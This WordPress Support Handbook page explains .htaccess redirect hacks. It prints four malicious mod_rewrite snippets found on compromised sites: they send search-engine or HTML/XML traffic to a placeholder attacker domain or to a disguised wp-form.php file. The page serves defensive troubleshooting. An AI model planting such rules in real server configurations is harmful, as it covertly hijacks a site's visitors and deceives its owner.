Welcome to the official blog for the WordPress Support team.

Need help with a WordPress issue? You can find help with your WordPress problem by posting in the support forums or asking on the #wordpress IRC channel.

Want to get involved?

Answering a question in the support forums or on IRC is one of the easiest ways to get started. Everyone knows the answer to something!

We have a detailed handbook to help contributors learn how to work with the forums and IRC.

Weekly Meetings

As well as discussing support issues here on the blog, we use Slack for group communication.

Our weekly meeting is held every Thursday 17:00 UTC, with the first meeting of the month being office hours, and the next will be at Thursday, 17:00 UTC (your time zone) in #forums on SlackSlack Slack is a Collaborative Group Chat Platform https://slack.com/. The WordPress community has its own Slack Channel at https://make.wordpress.org/chat/..

Home / Support Handbook / Appendix / Breakfix Lessons / Hacked: .htaccess redirect

Hacked: .htaccess redirect

The following snippit comes from a real hack. This code was found in the .htaccess files and checks for any traffic to be sent to the site and it automatically redirects to another site.

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

This code is slightly more clever and only redirects htmlHTML HTML is an acronym for Hyper Text Markup Language. It is a markup language that is used in the development of web pages and websites. or xml pages. This is clever because it’s not something you’d actually notice unless you went to a html file (something WP sites rarely do).

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteRule ([^.]+\.(html|xml|))$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

This one checks where you came from and if it was a search engine, redirects you.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://EVILHACKERSITE.COM/in.html?s=hg [R,L]
Errordocument 404 http://EVILHACKERSITE.COM/in.html?s=hg_err

Here’s another, that tries to blend the last two by detecting search engines or if you’re going to a named file extension (again, something most WordPress visitors never do) and redirect them.

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{HTTP_USER_AGENT} (google|msn|aol|bing) [NC,OR]
        RewriteCond %{HTTP_REFERER} (yahoo|google|aol|bing) [NC]
        RewriteCond %{REQUEST_URI} /$ [OR]
        RewriteCond %{REQUEST_FILENAME} (html|htm|shtm|shtml|php|php3|php4|php5)$ [NC]
        RewriteCond %{REQUEST_FILENAME} !wp-form\.php$
        RewriteRule ^.*?$ /wp-form.php [L]
</IfModule>

Where this one gets super sneaky is that it made a file called wp-form.php, which looks like but is not a real WordPress file. In that file was a series of checks and redirects which sent the visitor to another website. Where this particular hack failed is that the wp-admin pages usually end in .php, so the site admin noticed that he was being redirected when he tried to go to, say, example.com/wp-admin/plugins.php – Ooops.

Last updated: October 29, 2014

s: search
c: compose new post
r: reply
e: edit
t: go to top
j: go to the next post or comment
k: go to the previous post or comment
o: toggle comment visibility
esc: cancel edit post or comment